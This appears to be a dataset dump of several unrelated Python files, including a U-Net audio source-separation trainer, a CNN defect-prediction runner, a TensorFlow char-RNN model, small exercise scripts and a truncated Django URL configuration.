else:\r\n # out_channels is always going to be the same\r\n # as in_channels\r\n return nn.Sequential(\r\n nn.Upsample(mode='bilinear', scale_factor=2),\r\n conv1x1(in_channels, out_channels))\r\n\r\ndef conv1x1(in_channels, out_channels, groups=1):\r\n return nn.Conv2d(\r\n in_channels,\r\n out_channels,\r\n kernel_size=1,\r\n groups=groups,\r\n stride=1)\r\n\r\n\r\nclass DownConv(nn.Module):\r\n \"\"\"\r\n A helper Module that performs 2 convolutions 
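(3x3)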
and 1 MaxPool.\r\n A ReLU activation follows each convolution.\r\n \"\"\"\r\n def __init__(self, in_channels, out_channels, pooling=True):\r\n super(DownConv, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.pooling = pooling\r\n\r\n self.conv1 = conv3x3(self.in_channels, self.out_channels)\r\n self.conv2 = conv3x3(self.out_channels, self.out_channels)\r\n\r\n if self.pooling:\r\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\r\n\r\n def forward(self, x):\r\n x = F.relu(self.conv1(x))\r\n x = F.relu(self.conv2(x))\r\n before_pool = x\r\n if self.pooling:\r\n x = self.pool(x)\r\n return x, before_pool\r\n\r\n\r\nclass UpConv(nn.Module):\r\n \"\"\"\r\n A helper Module that performs 2 convolutions and 1 UpConvolution.\r\n A ReLU activation follows each convolution.\r\n \"\"\"\r\n def __init__(self, in_channels, out_channels,\r\n merge_mode='concat', up_mode='transpose'):\r\n super(UpConv, self).__init__()\r\n\r\n self.in_channels = in_channels\r\n self.out_channels = out_channels\r\n self.merge_mode = merge_mode\r\n self.up_mode = up_mode\r\n\r\n self.upconv = upconv2x2(self.in_channels, self.out_channels,\r\n mode=self.up_mode)\r\n\r\n if self.merge_mode == 'concat':\r\n self.conv1 = conv3x3(\r\n 2*self.out_channels, self.out_channels)\r\n else:\r\n # num of input channels to conv2 is same\r\n self.conv1 = conv3x3(self.out_channels, self.out_channels)\r\n self.conv2 = conv3x3(self.out_channels, self.out_channels)\r\n\r\n\r\n def forward(self, from_down, from_up):\r\n \"\"\" Forward pass\r\n Arguments:\r\n from_down: tensor from the encoder pathway\r\n from_up: upconv'd tensor from the decoder pathway\r\n \"\"\"\r\n from_up = self.upconv(from_up)\r\n if self.merge_mode == 'concat':\r\n x = torch.cat((from_up, from_down), 1)\r\n else:\r\n x = from_up + from_down\r\n x = F.relu(self.conv1(x))\r\n x = F.relu(self.conv2(x))\r\n return x\r\n\r\n\r\nclass UNet(nn.Module):\r\n \"\"\" `UNet` class is based on https://arxiv.org/abs/1505.04597\r\n The U-Net is a convolutional encoder-decoder neural network.\r\n Contextual spatial information (from the decoding,\r\n expansive pathway) about an input tensor is merged with\r\n information representing the localization of details\r\n (from the encoding, compressive pathway).\r\n Modifications to the original paper:\r\n (1) padding is used in 3x3 convolutions to prevent loss\r\n of border pixels\r\n (2) merging outputs does not require cropping due to (1)\r\n (3) residual connections can be used by specifying\r\n UNet(merge_mode='add')\r\n (4) if non-parametric upsampling is used in the decoder\r\n pathway (specified by upmode='upsample'), then an\r\n additional 1x1 2d convolution occurs after upsampling\r\n to reduce channel dimensionality by a factor of 2.\r\n This channel halving happens with the convolution in\r\n the tranpose convolution (specified by upmode='transpose')\r\n \"\"\"\r\n\r\n def __init__(self, num_classes, in_channels=1, depth=5,\r\n start_filts=64, up_mode='transpose',\r\n merge_mode='concat'):\r\n \"\"\"\r\n Arguments:\r\n in_channels: int, number of channels in the input tensor.\r\n Default is 3 for RGB images.\r\n depth: int, number of MaxPools in the U-Net.\r\n start_filts: int, number of convolutional filters for the\r\n first conv.\r\n up_mode: string, type of upconvolution. 
Choices: 'transpose'\r\n for transpose convolution or 'upsample' for nearest neighbour\r\n upsampling.\r\n \"\"\"\r\n super(UNet, self).__init__()\r\n\r\n if up_mode in ('transpose', 'upsample'):\r\n self.up_mode = up_mode\r\n else:\r\n raise ValueError(\"\\\"{}\\\" is not a valid mode for \"\r\n \"upsampling. Only \\\"transpose\\\" and \"\r\n \"\\\"upsample\\\" are allowed.\".format(up_mode))\r\n\r\n if merge_mode in ('concat', 'add'):\r\n self.merge_mode = merge_mode\r\n else:\r\n raise ValueError(\"\\\"{}\\\" is not a valid mode for \"\r\n \"merging up and down paths. \"\r\n \"Only \\\"concat\\\" and \"\r\n \"\\\"add\\\" are allowed.\".format(merge_mode))\r\n\r\n # NOTE: up_mode 'upsample' is incompatible with merge_mode 'add'\r\n if self.up_mode == 'upsample' and self.merge_mode == 'add':\r\n raise ValueError(\"up_mode \\\"upsample\\\" is incompatible \"\r\n \"with merge_mode \\\"add\\\" at the moment \"\r\n \"because it doesn't make sense to use \"\r\n \"nearest neighbour to reduce \"\r\n \"depth channels (by half).\")\r\n\r\n self.num_classes = num_classes\r\n self.in_channels = in_channels\r\n self.start_filts = start_filts\r\n self.depth = depth\r\n\r\n self.down_convs = []\r\n self.up_convs = []\r\n\r\n # create the encoder pathway and add to a list\r\n for i in range(depth):\r\n ins = self.in_channels if i == 0 else outs\r\n outs = self.start_filts*(2**i)\r\n pooling = True if i < depth-1 else False\r\n\r\n down_conv = DownConv(ins, outs, pooling=pooling)\r\n self.down_convs.append(down_conv)\r\n\r\n # create the decoder pathway and add to a list\r\n # - careful! decoding only requires depth-1 blocks\r\n for i in range(depth-1):\r\n ins = outs\r\n outs = ins // 2\r\n up_conv = UpConv(ins, outs, up_mode=up_mode,\r\n merge_mode=merge_mode)\r\n self.up_convs.append(up_conv)\r\n\r\n self.conv_final = conv1x1(outs, self.num_classes)\r\n\r\n # add the list of modules to current module\r\n self.down_convs = nn.ModuleList(self.down_convs)\r\n self.up_convs = nn.ModuleList(self.up_convs)\r\n\r\n self.reset_params()\r\n\r\n @staticmethod\r\n def weight_init(m):\r\n if isinstance(m, nn.Conv2d):\r\n nn.init.xavier_normal_(m.weight)\r\n nn.init.constant_(m.bias, 0)\r\n\r\n\r\n def reset_params(self):\r\n for i, m in enumerate(self.modules()):\r\n self.weight_init(m)\r\n\r\n\r\n def forward(self, x):\r\n encoder_outs = []\r\n\r\n # encoder pathway, save outputs for merging\r\n for i, module in enumerate(self.down_convs):\r\n x, before_pool = module(x)\r\n encoder_outs.append(before_pool)\r\n\r\n for i, module in enumerate(self.up_convs):\r\n before_pool = encoder_outs[-(i+2)]\r\n x = module(before_pool, x)\r\n\r\n # Note that this is only going to give a mask- we need to apply that mask to the audio before we can compare to the GT.\r\n x = self.conv_final(x)\r\n #was torch.tanh(x)\r\n x = torch.sigmoid(x)\r\n return x\r\n\r\n#load the data\r\n\r\nn_fft = 1023\r\nhop_sz = int((n_fft+1)/2)\r\nwindow_fn = torch.hann_window(n_fft)\r\n\r\n#takes in a filepath, returns a 512x512xN tensor of stft frames\r\ndef split_wav(filepath):\r\n wavData,fs = torchaudio.load(filepath)\r\n wavData = torch.mean(wavData, dim=0)\r\n\r\n complex_mix = torch.stft(wavData, n_fft = n_fft, hop_length = hop_sz, window = window_fn)\r\n complex_mix_pow = complex_mix.pow(2).sum(-1)\r\n complex_mix_mag = torch.sqrt(complex_mix_pow)\r\n\r\n n_splits = (complex_mix_mag.size()[1]//hop_sz)\r\n\r\n complex_mix_mag = complex_mix_mag[:,0:n_splits*hop_sz]\r\n\r\n chunks = torch.chunk(complex_mix_mag,n_splits,1)\r\n stack = 
torch.stack(chunks,dim = 0)\r\n return stack\r\n\r\n\r\ndataset_path = \"D:/source_sep_data/musdb18hq/train\"\r\nn_files = 0\r\nfs = 0\r\npad = nn.ConstantPad1d((0,1),0)\r\nstart_time = time.time()\r\ncurr_song = \"none\"\r\ninput = \"mixture.wav\"\r\ngt = \"vocals.wav\"\r\n\r\n#make a list of all the files in the training set\r\nfiles_list = []\r\nfn_list = []\r\n#if counter is even, we can add fn_list to files_list\r\ncounter = 0\r\nfor dirpath, dirs, files in os.walk(dataset_path):\r\n for file in files:\r\n filepath = dirpath + os.sep + file\r\n #we always want mixture last!\r\n #if file == gt or file == input:\r\n if file == gt or file == input:\r\n fn_list.append(file)\r\n counter = counter + 1\r\n\r\n if counter%2 == 0 and len(fn_list) > 0:\r\n idx = fn_list.index(gt)\r\n gt_filepath = dirpath + os.sep + fn_list[idx]\r\n files_list.append(gt_filepath)\r\n fn_list.pop(idx)\r\n input_filepath = dirpath + os.sep + fn_list[0]\r\n files_list.append(input_filepath)\r\n fn_list.pop(0)\r\n #files_list.append(filepath)\r\n\r\n#give input and gt filenames one song at a time\r\ndef get_next_song(curr_song):\r\n if curr_song == \"start\":\r\n retval = [files_list[0],files_list[1]]\r\n elif files_list.index(curr_song) < len(files_list)-1:\r\n retval = [files_list[files_list.index(curr_song)+1], files_list[files_list.index(curr_song)+2]]\r\n else:\r\n retval = []\r\n return retval\r\n\r\ndef mean(list):\r\n return sum(list)/len(list)\r\n\r\n#run the data through the model\r\n\r\nnetwork = UNet(1,1)\r\nnetwork.cuda()\r\nnetwork.train()\r\n\r\nloss_fn = nn.MSELoss()\r\noptimizer = torch.optim.Adam(network.parameters(), lr = .0001, betas = (.5,.999))\r\n\r\nepoch_counter = 1\r\nkeep_training = True\r\nwhile keep_training:\r\n epoch_losses = []\r\n start_time = time.time()\r\n curr_song = [\"junk\",\"start\"]\r\n\r\n #while there are more training examples:\r\n while get_next_song(curr_song[1]) != []:\r\n #this line is a problem\r\n print(curr_song[1])\r\n curr_song = get_next_song(curr_song[1])\r\n gt = split_wav(curr_song[0]).cuda()\r\n input = split_wav(curr_song[1]).cuda()\r\n #print(input.size())\r\n\r\n for input_ary, gt_ary in zip(input,gt):\r\n\r\n #print(input_ary.size())\r\n #print(gt_ary.size())\r\n network.zero_grad()\r\n\r\n model_output = network(input_ary.unsqueeze(0).unsqueeze(0))\r\n #print(torch.max(model_output))\r\n #print(torch.min(model_output))\r\n\r\n output_spec = input_ary * model_output\r\n\r\n loss = loss_fn(output_spec, gt_ary.unsqueeze(0).unsqueeze(0))\r\n loss.backward()\r\n optimizer.step()\r\n\r\n epoch_losses.append(loss.item())\r\n\r\n print(\"Epoch {} finished! 
Average Loss: {}, Total Time: {}\".format(epoch_counter,mean(epoch_losses),time.time()-start_time))\r\n\r\n if epoch_counter > 3:\r\n print(\"Training Finished!\")\r\n keep_training = False\r\n\r\n epoch_counter = epoch_counter + 1\r\n","sub_path":"spectral_network.py","file_name":"spectral_network.py","file_ext":"py","file_size_in_byte":11994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196870656","text":"def pig_it(text):\n t = text.split()\n atinlay = []\n for word in t:\n l = word[:1]\n pituus = len(word)\n atinlay.append(''.join((word[1:pituus],l,'ay')))\n return ' '.join(atinlay)\n\n\npig_it('Pig latin is cool')\n\n","sub_path":"python training/pig_it.py","file_name":"pig_it.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"385683042","text":"import numpy as np\n\nm = 0\nn = 0\nwith open(\"battleships_sample1p.txt\", \"r\") as p0:\n\theader = p0.readline()\n\tsize = header.split()\n\tm = int(size[0])\n\tn = int(size[1])\n\np = open(\"result.txt\", \"r\")\nq = open(\"battleships.csp\", \"a\")\n\nprint(\"(not (&& \", end=\"\",file=q)\nfor i in range(0, m*n):\n\tline = p.readline()\n\two = line.split()\n\tprint(\"(= {0} {1}) \".format(wo[1],wo[2]),end=\"\",file=q)\n\nprint(\") )\",file=q)\n\np.close()\nq.close()\n","sub_path":"Battleships/uniqueness.py","file_name":"uniqueness.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"508128042","text":"import torch.utils.data as Data\nimport datetime\nimport itertools\nimport torch.optim as optim\nimport torch\nimport models.CNN as CNN\nimport torch.nn as nn\n\nfrom tool.imblearn.over_sampling import RandomOverSampler\nfrom CNN_Test import *\nfrom ParsingSource import *\nfrom Tools import *\n\n\n# -------Auxiliary method--------Start\ndef init_record_data():\n record_data = {'Training Set': [], 'Test Set': [], 'Model': [], 'Embedding Dim': [], 'Number of Filter': [],\n 'Filter Size': [], 'Number of Hidden Nodes': [], 'Learning Rate': [], 'Momentun': [], 'L2 Weight': [],\n 'Dropout': [], 'Number of Epoch': [], 'Stride': [], 'Padding': [], 'Batch Size': [], 'Pool Size': [],\n 'Loop Size': [], 'accuracy_mean': [], 'accuracy_std': [], 'AUC_mean': [], 'AUC_std': [],\n 'F-measure_mean': [], 'F-measure_std': [], 'MCC_mean': [], 'MCC_std': []}\n return record_data\n\n\ndef insert_param(training, test, model_name, nn_params, loop_size, data):\n data['Training Set'].append(training)\n data['Test Set'].append(test)\n data['Model'].append(model_name)\n\n data['Embedding Dim'].append(nn_params['EMBED_DIM'])\n data['Number of Filter'].append(nn_params['N_FILTER'])\n data['Filter Size'].append(nn_params['FILTER_SIZE'])\n data['Number of Hidden Nodes'].append(nn_params['N_HIDDEN_NODE'])\n data['Learning Rate'].append(nn_params['LEARNING_RATE'])\n data['Momentun'].append(nn_params['MOMEMTUN'])\n data['L2 Weight'].append(nn_params['L2_WEIGHT'])\n data['Dropout'].append(nn_params['DROPOUT'])\n data['Number of Epoch'].append(nn_params['N_EPOCH'])\n data['Stride'].append(nn_params['STRIDE'])\n data['Padding'].append(nn_params['PADDING'])\n data['Batch Size'].append(nn_params['BATCH_SIZE'])\n data['Pool Size'].append(nn_params['POOL_SIZE'])\n\n data['Loop Size'].append(str(loop_size))\n\n\ndef insert_result(acc_m, acc_s, auc_m, auc_s, f1_m, f1_s, mcc_m, mcc_s, data):\n data['accuracy_mean'].append(round(acc_m, 
3))\n data['accuracy_std'].append(round(acc_s, 3))\n data['AUC_mean'].append(round(auc_m, 3))\n data['AUC_std'].append(round(auc_s, 3))\n data['F-measure_mean'].append(round(f1_m, 3))\n data['F-measure_std'].append(round(f1_s, 3))\n data['MCC_mean'].append(round(mcc_m, 3))\n data['MCC_std'].append(round(mcc_s, 3))\n\n\ndef save_data(file_name, training, test, data):\n df = pd.DataFrame(data=data,\n columns=['Training Set', 'Test Set', 'Model', 'Embedding Dim', 'Number of Filter', 'Filter Size',\n 'Number of Hidden Nodes', 'Learning Rate', 'Momentun', 'L2 Weight', 'Dropout', 'Number of Epoch',\n 'Stride', 'Padding', 'Batch Size', 'Pool Size', 'Loop Size', 'accuracy_mean',\n 'accuracy_std', 'AUC_mean', 'AUC_std', 'F-measure_mean', 'F-measure_std', 'MCC_mean', 'MCC_std'])\n\n save_path = 'result/' + file_name + '.csv'\n if os.path.exists(save_path):\n df.to_csv(save_path, mode='a', header=False, index=False)\n else:\n df.to_csv(save_path, mode='w', index=False)\n\n\ndef calculate_save_data(model_name, path0, path1, nn_params, LOOP_SIZE, acc, auc, f1, mcc):\n # Calculate the mean and standard deviation\n acc, auc, f1, mcc = np.array(acc), np.array(auc), np.array(f1), np.array(mcc)\n acc_m, acc_s, auc_m, auc_s, f1_m, f1_s, mcc_m, mcc_s = acc.mean(), acc.std(), auc.mean(), auc.std(), f1.mean(), f1.std(), mcc.mean(), mcc.std()\n\n # Save the results in a file\n record_data = init_record_data()\n insert_result(acc_m, acc_s, auc_m, auc_s, f1_m, f1_s, mcc_m, mcc_s, data=record_data)\n insert_param(training=path0, test=path1, model_name=model_name, nn_params=nn_params, loop_size=LOOP_SIZE, data=record_data)\n save_data(result_file_name, path0, path1, record_data)\n\n# -------Auxiliary method--------end\n\n# Initial superparameter of convolutional networks\ninit_cnn_params = {'EMBED_DIM': 30, 'N_FILTER': 10, 'FILTER_SIZE': 5, 'N_HIDDEN_NODE': 100, 'N_EPOCH': 15, 'BATCH_SIZE': 32, 'LEARNING_RATE': 1e-5,\n 'MOMEMTUN': 0.9, 'L2_WEIGHT': 0.005, 'DROPOUT': 0.5, 'STRIDE': 1, 'PADDING': 0, 'POOL_SIZE': 2, 'DICT_SIZE': 0, 'TOKEN_SIZE': 0}\n\n# Adjustable parameter\nREGENERATE = False\ndump_data_path = 'data/balanced_dump_data_1549189395/'\nresult_file_name = 'CNN Result'\nLOOP_SIZE = 1 # 20\n\nopt_node = [100]\nopt_batchsize = [32]\nopt_epoch = [15] # 15\nopt_learning_rate = [1e-5]\n\n# Fixed parameter\nIMBALANCE_PROCESSOR = RandomOverSampler() # RandomOverSampler(), RandomUnderSampler(), None, 'cost'\nHANDCRAFT_DIM = 20\nDEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nroot_path_source = 'data/projects/'\nroot_path_csv = 'data/csvs/'\npackage_heads = ['org', 'gnu', 'bsh', 'javax', 'com']\n\n# Start time\nstart_time = datetime.datetime.now()\nstart_time_str = start_time.strftime('%Y-%m-%d_%H.%M.%S')\n\n# Get a list of source and target projects\npath_train_and_test = []\nwith open('data/pairs-one.txt', 'r') as file_obj:\n for line in file_obj.readlines():\n line = line.strip('\\n')\n line = line.strip(' ')\n path_train_and_test.append(line.split(','))\n\n# Loop each pair of combinations\nfor path in path_train_and_test:\n\n # Get file\n path_train_source = root_path_source + path[0]\n path_train_handcraft = root_path_csv + path[0] + '.csv'\n path_test_source = root_path_source + path[1]\n path_test_handcraft = root_path_csv + path[1] + '.csv'\n\n # Regenerate token or get from dump_data\n print(path[0] + \"===\" + path[1])\n train_project_name = path_train_source.split('/')[2]\n test_project_name = path_test_source.split('/')[2]\n path_train_and_test_set = dump_data_path + 
train_project_name + '_to_' + test_project_name\n # If you don't need to regenerate, get it directly from dump_data\n if os.path.exists(path_train_and_test_set) and not REGENERATE:\n obj = load_data(path_train_and_test_set)\n [train_ast, train_hand_craft, train_label, test_ast, test_hand_craft, test_label, vector_len, vocabulary_size] = obj\n else:\n # Get a list of instances of the training and test sets\n train_file_instances = extract_handcraft_instances(path_train_handcraft)\n test_file_instances = extract_handcraft_instances(path_test_handcraft)\n\n # Get tokens\n dict_token_train = parse_source(path_train_source, train_file_instances, package_heads)\n dict_token_test = parse_source(path_test_source, test_file_instances, package_heads)\n\n # Turn tokens into numbers\n list_dict, vector_len, vocabulary_size = transform_token_to_number([dict_token_train, dict_token_test])\n dict_encoding_train = list_dict[0]\n dict_encoding_test = list_dict[1]\n\n # Take out data that can be used for training\n train_ast, train_hand_craft, train_label = extract_data(path_train_handcraft, dict_encoding_train)\n test_ast, test_hand_craft, test_label = extract_data(path_test_handcraft, dict_encoding_test)\n\n # Imbalanced processing\n train_ast, train_hand_craft, train_label = imbalance_process(train_ast, train_hand_craft, train_label, IMBALANCE_PROCESSOR)\n\n # Saved to dump_data\n obj = [train_ast, train_hand_craft, train_label, test_ast, test_hand_craft, test_label, vector_len, vocabulary_size]\n dump_data(path_train_and_test_set, obj)\n\n # ZScore\n train_hand_craft = (train_hand_craft - np.mean(train_hand_craft, axis=0)) / np.std(train_hand_craft, axis=0)\n test_hand_craft = (test_hand_craft - np.mean(test_hand_craft, axis=0)) / np.std(test_hand_craft, axis=0)\n\n # Data from numpy to tensor\n train_ast = torch.Tensor(train_ast).to(DEVICE)\n test_ast = torch.Tensor(test_ast).to(DEVICE)\n\n # Select nn parameters\n nn_params = init_cnn_params.copy()\n nn_params['DICT_SIZE'] = vocabulary_size + 1\n nn_params['TOKEN_SIZE'] = vector_len\n\n train_dataset = Data.TensorDataset(train_ast, torch.Tensor(train_label).to(DEVICE))\n # nn_params['BATCH_SIZE'] = len(train_ast) # use a full-size batch\n\n for batch_size in opt_batchsize:\n # Build a loader for the current batch size\n loader = Data.DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n\n for params_i in itertools.product(opt_node, opt_epoch, opt_learning_rate):\n # Select nn parameters\n nn_params['N_HIDDEN_NODE'] = params_i[0]\n nn_params['N_EPOCH'] = params_i[1]\n nn_params['LEARNING_RATE'] = params_i[2]\n\n # ------------------ CNN training begins ------------------\n CNN_acc, CNN_auc, CNN_f1, CNN_mcc = [], [], [], []\n DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc = [], [], [], []\n for l in range(LOOP_SIZE):\n model = CNN.CNN(nn_params)\n model.to(DEVICE)\n\n # Train\n init_lr = nn_params['LEARNING_RATE']\n for epoch in range(nn_params['N_EPOCH']):\n # Optimizer is Adam\n optimizer = optim.Adam(model.parameters(), lr=init_lr, betas=(0.9, 0.999), eps=1e-8, weight_decay=nn_params['L2_WEIGHT'], amsgrad=False)\n # lr = init_lr / math.pow((1 + 10 * (epoch - 1) / cnn_params['N_EPOCH']), 0.75)\n # optimizer = optim.SGD(model.parameters(), lr=lr, momentum=cnn_params['MOMEMTUN'], weight_decay=cnn_params['L2_WEIGHT'])\n\n total_loss_train = 0\n for step, (batch_ast_x, batch_y) in enumerate(loader):\n print('epoch - step ' + str(epoch) + ' - ' + str(step))\n model.train()\n y_score, y_pred, features = model(batch_ast_x)\n\n criterion = 
nn.BCELoss().to(DEVICE)\n batch_y = batch_y.float()\n loss = criterion(y_score, batch_y)\n print('loss: ' + str(loss))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n total_loss_train += loss.data\n\n res_e = 'Epoch: [{}/{}], training loss: {:.6f}'.format(epoch, nn_params['N_EPOCH'], total_loss_train / len(loader))\n print(res_e)\n\n # CNN\n model_name = 'CNN'\n CNN_acc, CNN_auc, CNN_f1, CNN_mcc = CNN_test(model_name, model, train_ast, test_ast, train_label, test_label, train_hand_craft,\n test_hand_craft, CNN_acc, CNN_auc, CNN_f1, CNN_mcc)\n\n # DPCNN\n model_name = 'DPCNN'\n DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc = CNN_test(model_name, model, train_ast, test_ast, train_label, test_label, train_hand_craft,\n test_hand_craft, DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc)\n\n # The result is calculated and stored in the file\n calculate_save_data('CNN', path[0], path[1], nn_params, LOOP_SIZE, CNN_acc, CNN_auc, CNN_f1, CNN_mcc)\n calculate_save_data('DPCNN', path[0], path[1], nn_params, LOOP_SIZE, DPCNN_acc, DPCNN_auc, DPCNN_f1, DPCNN_mcc)\n # ------------------ Training End ------------------\n\n# End time\nend_time = datetime.datetime.now()\nprint(end_time - start_time)\n","sub_path":"run_cnn.py","file_name":"run_cnn.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"100480446","text":"# coding: utf-8\nfrom __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport os\nimport config as cfg\n\ndef pick_top_n(preds, vocab_size, top_n=5):\n p = np.squeeze(preds)\n # zero out every position except the top_n predictions\n p[np.argsort(p)[:-top_n]] = 0\n # renormalize the probabilities\n p = p / np.sum(p)\n # randomly pick one character\n c = np.random.choice(vocab_size, 1, p=p)[0]\n return c\n\n\nclass CharRNN(object):\n def __init__(self, num_classes, isTraining = True, grad_clip=5):\n if isTraining:\n num_seqs, num_steps = cfg.batch_size, cfg.char_length\n else:\n num_seqs, num_steps = 1, 1\n\n self.num_classes = num_classes\n self.num_seqs = num_seqs\n self.num_steps = num_steps\n self.lstm_size = cfg.lstm_size\n self.num_layers = cfg.num_layers\n self.use_embedding = cfg.use_embedding\n self.embedding_size = cfg.embedding_size\n self.grad_clip = grad_clip # needed later by build_optimizer()\n\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n if isTraining:\n self.inputs = tf.placeholder(tf.int32, shape=(self.num_seqs, self.num_steps), name='inputs')\n self.outputs = tf.placeholder(tf.int32, shape=(self.num_seqs, self.num_steps), name='outputs')\n else:\n self.inputs = tf.placeholder(tf.int32, shape=(1, 1), name='inputs')\n\n # Chinese text needs an embedding layer; plain English letters do not\n if self.use_embedding is False:\n lstm_inputs = tf.one_hot(self.inputs, self.num_classes)\n else:\n embedding = tf.get_variable('embedding', initializer = tf.random_uniform(\n [self.num_classes, self.embedding_size], -1.0, 1.0))\n lstm_inputs = tf.nn.embedding_lookup(embedding, self.inputs)\n\n self.final_state, self.logits, self.proba_prediction = self.build_lstm(lstm_inputs)\n if isTraining:\n self.loss = self.build_loss(self.logits, self.outputs)\n self.saver = tf.train.Saver() # used by train() to checkpoint and by load() to restore\n\n def build_lstm(self, inputs):\n # build a single cell, then stack multiple layers\n def get_a_cell(lstm_size, keep_prob):\n lstm = tf.nn.rnn_cell.BasicLSTMCell(lstm_size)\n drop = tf.nn.rnn_cell.DropoutWrapper(lstm, output_keep_prob=keep_prob)\n return drop\n\n cell = tf.nn.rnn_cell.MultiRNNCell(\n [get_a_cell(self.lstm_size, self.keep_prob) for _ in range(self.num_layers)]\n )\n initial_state = self.initial_state = cell.zero_state(self.num_seqs, tf.float32) # kept as an attribute: train() and sample() feed it\n\n # unroll the cell over the time dimension with dynamic_rnn\n lstm_outputs, 
final_state = tf.nn.dynamic_rnn(cell, inputs, initial_state=initial_state)\n\n # turn lstm_outputs into class probabilities\n seq_output = tf.concat(lstm_outputs, 1)\n x = tf.reshape(seq_output, [-1, self.lstm_size])\n\n softmax_w = tf.Variable(tf.truncated_normal([self.lstm_size, self.num_classes], stddev=0.1))\n softmax_b = tf.Variable(tf.zeros(self.num_classes))\n\n logits = tf.matmul(x, softmax_w) + softmax_b\n proba_prediction = tf.nn.softmax(logits, name='predictions')\n\n return final_state, logits, proba_prediction\n\n def build_loss(self, predict, label):\n y_one_hot = tf.one_hot(label, self.num_classes)\n y_reshaped = tf.reshape(y_one_hot, predict.get_shape())\n loss = tf.nn.softmax_cross_entropy_with_logits(logits=predict, labels=y_reshaped)\n loss = tf.reduce_mean(loss)\n return loss\n\n def build_optimizer(self):\n # clip gradients by global norm\n # NOTE: assumes self.learning_rate has been set by the caller before this is called\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(self.loss, tvars), self.grad_clip)\n train_op = tf.train.AdamOptimizer(self.learning_rate)\n self.optimizer = train_op.apply_gradients(zip(grads, tvars))\n\n def train(self, batch_generator, max_steps, save_path, save_every_n, log_every_n, train_keep_prob=0.5):\n # train_keep_prob is the dropout keep probability (the 0.5 default is an assumption);\n # build_optimizer() must have been called beforehand so that self.optimizer exists\n self.session = tf.Session()\n with self.session as sess:\n sess.run(tf.global_variables_initializer())\n # Train network\n step = 0\n new_state = sess.run(self.initial_state)\n\n for x, y in batch_generator:\n step += 1\n start = time.time()\n feed = {self.inputs: x,\n self.outputs: y,\n self.keep_prob: train_keep_prob,\n self.initial_state: new_state}\n batch_loss, new_state, _ = sess.run([self.loss,\n self.final_state,\n self.optimizer],\n feed_dict=feed)\n\n end = time.time()\n # control the print lines\n if step % log_every_n == 0:\n print('step: {}/{}... '.format(step, max_steps),\n 'loss: {:.4f}... 
'.format(batch_loss),\n '{:.4f} sec/batch'.format((end - start)))\n if (step % save_every_n == 0):\n self.saver.save(sess, os.path.join(save_path, 'model'), global_step=step)\n if step >= max_steps:\n break\n self.saver.save(sess, os.path.join(save_path, 'model'), global_step=step)\n\n def sample(self, n_samples, prime, vocab_size):\n samples = [c for c in prime]\n sess = self.session\n new_state = sess.run(self.initial_state)\n preds = np.ones((vocab_size, )) # for prime=[]\n for c in prime:\n x = np.zeros((1, 1))\n # feed a single character\n x[0, 0] = c\n feed = {self.inputs: x,\n self.keep_prob: 1.,\n self.initial_state: new_state}\n preds, new_state = sess.run([self.proba_prediction, self.final_state],\n feed_dict=feed)\n\n c = pick_top_n(preds, vocab_size)\n # append the character to samples\n samples.append(c)\n\n # keep generating characters until the requested count is reached\n for i in range(n_samples):\n x = np.zeros((1, 1))\n x[0, 0] = c\n feed = {self.inputs: x,\n self.keep_prob: 1.,\n self.initial_state: new_state}\n preds, new_state = sess.run([self.proba_prediction, self.final_state],\n feed_dict=feed)\n\n c = pick_top_n(preds, vocab_size)\n samples.append(c)\n\n return np.array(samples)\n\n def load(self, checkpoint):\n self.session = tf.Session()\n self.saver.restore(self.session, checkpoint)\n print('Restored from: {}'.format(checkpoint))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525377913","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'usuarios.views.ingresar'), \n url(r'^contact-us/', TemplateView.as_view(template_name=\"twitter/contact_form.html\")),\n url(r'^registrate/', 'usuarios.views.register'),\n url(r'^registrate/', TemplateView.as_view(template_name=\"twitter/register.html\")),\n url(r'^login/$', 'usuarios.views.ingresar'),\n url(r'^twitter/logout/$', 'usuarios.views.logout'),\n url(r'^twitter/logout/', TemplateView.as_view(template_name=\"twitter/logout.html\")),\n url(r'^perfil/', 'micropost.views.ver_perfil'),\n url(r'^modperfil/$', 'usuarios.views.perfil'),\n url(r'^modperfil/', TemplateView.as_view(template_name=\"twitter/perfil.html\")), \n url(r'^login/listar_usu/', 'usuarios.views.mostrar_usuarios'),\n url(r'^login/eliminar_usu/(\\d+)/$', 'usuarios.views.eliminar_usuarios'),\n #Micropost\n url(r'^microposts/$','micropost.views.new'),\n url(r'^microposts/mi_post/$', 'micropost.views.ver_mis_post'),\n url(r'^login/follow/(\\d+)/$', 'usuarios.views.follow'),\n url(r'^login/unfollow/(\\d+)/$', 'usuarios.views.unfollow'),\n url(r'^micropost/borrar/(\\d+)/$', 'micropost.views.borrar_post'),\n url(r'^perfil_usu/(\\d+)/$', 'usuarios.views.mostrar_perfil'),\n url(r'^activo/', TemplateView.as_view(template_name=\"twitter/noactivo.html\")),\n url(r'^about/', 